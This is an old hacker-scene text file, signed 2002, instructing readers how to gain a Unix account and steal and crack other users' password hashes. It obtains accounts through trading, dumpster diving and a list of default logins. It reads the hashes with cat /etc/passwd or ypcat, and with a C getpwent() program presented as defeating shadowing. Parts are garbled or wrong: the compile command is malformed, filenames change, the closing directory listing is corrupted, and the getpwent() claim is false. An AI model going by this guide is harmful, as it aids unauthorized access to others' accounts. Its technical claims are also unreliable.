How To Get The Passwd File in Unix

WHAT'S THE passwd?

'passwd' is the common name of the file in which user account information is stored on a UNIX system. You might consider it a comprehensive users list.The file contains the information for an accounts USERNAME, PASSWORD, USER NUMBER, GROUP, GECOS, HOME DIRECTORY, and SHELL. A single entry of a passwd file entry might look like this:


PASSWORD GROUP NUMBER HOME DIRECTORY
 / / /
/ / /
bhaze:8d34jSks73hsb:36:15:Black Haze:/usr/kusers/staff/bhaze:/kusr/bin/bhz
\ \ \ \
 \ \ \ \
USERNAME USER NUMBER GECOS INFORMATION SHELL


Okay, now take a look at the password entry : 8d34jSks73hsb
This in fact is NOT the password the security system would have to of been written by a total lamer if it where. Instead it is an encrypted equivalent to the real password. As a part of the UNIX account Registration process when a u and changes his password UNIX takes the password and encrypts it using an algorithm hackers have know for sometime. If a user has an account he has axs to the 'passwd' file in order to log in. But anyone else who has axs to the 'passwd' file can also look at everybody elses password. So in order for UNIX to have a tighter security system it encrypts the password in order for no one to look at other userz passwords.
encrypted equivalent of real password
/
bhaze:8d34jSks73hsb:36:15:Black Haze:/usr/kusers/staff/bhaze:/usr/bin/bhz

...you can many of the quadzillion UNIX password hackerz which decrypt the pas for you in order to log in.
Ok, at this point you should be ready to try and find a UNIX 'passwd' file to crack, right? Wrong. You still have a couple of minor, requisite tasks to perform. First, (obviously) you'll need to find a UNIX to hack. In most cases, you've already got one in mind, but just in case you don't we'll take
a look at a few. Also, once you've found a UNIX to hack, you'll need an account on that UNIX. There's no way to steal the 'passwd' file from a UNIX without first having an account on it (not true, you can always get a 'passwd' file from someone else, but ignore this because I'm contradicting
myself). Once you've accomplished your requisites you can start trying to steal the 'passwd' file.

Step 1. Finding a UNIX to Hack
Heres what a common UNIX login screen looks like:

Ultrx v4.3 (rev .44)
1 : Login to Arthur (Kingswood)
2 : Login to Guinevere (Kingswood)
3 : Login to Wizard (Westmead)
4 : Resume Session
5 : Exit System

V.32HS1 :
login:
Other UNIX machines are: System V, BSD, Xenix, and AIX. Look for these names to be somewhere in the login screen. Knowing what type of UNIX you're using will aid you in hacking it.

Step 2. An account to start with
If you already have a UNIX account go to Step 3. If you do not already have an account, you need to get one. Either: trade for one, trash for one, get a legitimate one, or hack one out by hand. The first three options are probably the easiest. You can trade for UNIX accounts on IRC channels #hack
or #phreak. You can trash for accounts in dumpsters and trashcans at most Colleges or Universities. You can buy accounts from any one of the increasing number of Internet Service Providers (they almost all use UNIX). But, of coure as well know you're a hacker, and the only hing you wanna do is Hack an account. So be it. Here's a list of UNIX defaults.
Note: These are some of the default passwords which come on a UNIX system And it's common that dumb System Managers at Uni's forget to delete most of the default accounts to gain axs. And if your lucky its possible some of them may work

root bin adm
makefsys sysadm sys
mountfsys rje sync
umountfsys tty nobody
checkfsys somebody setup
lp powerdown ingres
dptp general guest
daemon gsa user
trouble games help
nuucp public unix
uucp test admin
student standard pub
field demo batch
visitor listen network
uuhelp usenet sysinfo
cron console sysbin
who root2 startup
shutdown ncrm new


Once you have a working UNIX account you can now attempt to steal the passwd file. It can be extremely difficult in ways to 'steal' the passwords of users as they can be protected from others in numerous ways. We will discuss some of the common ways to get the passwd file
This is probably THE easiest and most common UNIX hack. login in to your account and try typing this at the prompt:

prompt concatenate
/ /
gwen> cat /etc/passwd
/ \
directory filename


'cat' is short for concatenate, a command used for reading and displaying files in standard output. '/etc' is the common directory for the password file on older UNIXes. 'passwd' is the common password filename on UNIXes. If you entered: cat /etc/passwd and got a listing that looks like this
(abbreviated):

bhaze:IS3fhZdWX3JGU:2162:15:Ken Bahadur:/kuser/staff/bhaze:/kusr/bin/bhz
\
password intact

...then k-rad! You've succesfully listed out (stolen) your first 'passwd' file. *Buffer* the entire contents to a text file, then kraq away......
If you got a listing that looks like this:

password tokenized
/
jakef:x:263:200:Jack Harmon:/usr/users/intruder:/bin/csh

or:

egghead:PASSWORD HERE:2183:129:Novel,,,:/usr/users/advisor/esvogt:/usr/bin/ksh
\
password removed

or you got:

cat: cannot open /etc/passwd

Then the UNIX you are on is utilizing some other form of protection or may be using a different 'passwd'-ing process. Keep reading.

-AIX-
On AIX systems, an UNIX variation, the 'passwd' file is in a different
"NIS (Network Information System) is the current name for what was once known as yp (Yellow Pages). The purpose for NIS is to allow many machines on a network to share configuration information, including password data. NIS IS NOT DESIGNED TO PROMOTE SYSTEM SECURITY. If
your system uses NIS you will have a very short /etc/passwd file that includes a line that looks like this:

+::0:0:::

"To view the real password type this command:"

gwen> ypcat passwd

If 'ypcat' lists a password file with the (encrypted) password still intact, copy the contents and launch a half decent UNIX proggy

If you still can't get the passwd file then chances are the host you are using might be a little to hard 2 kraq. If so try another service provider.

<> Password Shadowing <>

If your trying to kraq yourself a passwd file in UNIX with no sucess it is possible that the system shadow's the password. Password shadowing is a security system where the encrypted password field of /etc/passwd is replaced with a special token and the encrypted real password is stored
in a separate file which is not readable by normal system users

To defeat password shadowing on many systems (though not all) use the code below which uses successive calls to getpwent() to obtain the password file. This works on most systems and the chance of it working is quiet high, but if it doesn't chances are you the system is pretty
secure and will have a real hard time trying to kraq the system


#include <pwd.h>
main()
{

struct passwd *p;
while(p=getpwent())
printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);

}


If your unfimiliar with UNIX scripts, its a pretty kool idea not to get axs til' you at least know what your doing. But if you do read on..
First Copy the above script into a Text file and save it as 'axs.c'. Next Login to your UNIX account and create a directory called 'executables'. (At the prompt) Type:

prompt directory name
/ /
gwen> mkdir executables
/
make directory

You can either u/l your script via UNIX by:
rz axs.c
which will u/l the file in the current dir, or if you prefer Fetch or some other FTP client. FTP into your dir and Upload 'axs.c' into the directory 'executables' Once you've done this, login to your account, and goto the 'executables' directory
Type 'ls' to list the directory to make sure the file is there

gwen> cd executables

If it is you can attempt to compile the 'axs.c' script. Almost all UNIX system have Compilers, it's just a matter of whether or not you have acces TO an Compiler. Typically you do. At the UNIX prompt Type:

compiler executable
/ /
gwen> cc -o axs.c getfile
/ \
output filename
option

If you don't get an error you should be left with a file named 'a.out'. Type:

gwen> a.out

If you get a listing with the (encrypted) passwordz intact, kewl *buffer* the contents to a text file and go kraqn'. If not, keep readin

If you got an error when you tried to compile the 'getp.c' script: 'cc:
Command not found' then you either don't have that compiler or you don't have access to it. In either case, try compiling with the GNU C Compiler:

gnu c compiler
/
gwen> gcc axs.c
\
filename

Again, you should be left with a file named 'a.out'. At the UNIX prompt type: a.out. If you get a password file with the (encrypted) password file intact, *buffer* em. Mad, now use your fav UNIX kraqr proggy and kraq away!

After you have got your misfournate userz passwd you will be greeted with root at his dir!
total 307
drwxr-xr-x 3 alf 512 Feb 29 22:12 .
drwxr-xr-x2025 root 36352 Feb 30 09:03 ..
-rw-r--r-- 1 alf 0 Feb 27 13:322 .addreessbook
-rw-r--r-- 1 alf 29 Feb 17 19996 .bash__login
-rw-r--r-- 1 alf 25 Feb 17 19996 .bashrrc
-rw-r--r-- 1 alf 24 Feb 17 19996 .cshrcc
-rw-r--r-- 1 alf 320 Feb 29 22::13 .hisstory
-rw------- 1 alf 0 Feb 28 21:099 .ircmootd
-rw-r--r-- 1 alf 24 Mar 8 19966 .login<
-rw------- 1 alf 22925 Feb 27 113:33 .ppine-interrupted-mail
-rw-r--r-- 1 alf 5433 Feb 29 222:12 .piinerc
-rwxr-xr-x 1 alf 21 Feb 17 19996 .profiile
drwx------ 2 alf 512 Mar 8 21:11 mail
-rw-r--r-- 1 alf 221435 feb 26 21:05 teextbox.irc
%

- = - = - = - = - = - = - = - = - = - = - = - = - = - == -
StopWar
Contact information:
Email - MohamadAzmie@Hotmail.Com
Http:// - MasterZCrew.Cjb.Net & HackerMasterZ.Cjb.Net
- = - = - = - = - = - = - = - = - = - == - = - = - = - = -
Copyrighted (C) 2002 by StopWar  All rights Reserved MasterZCrew, Inc.

Back Home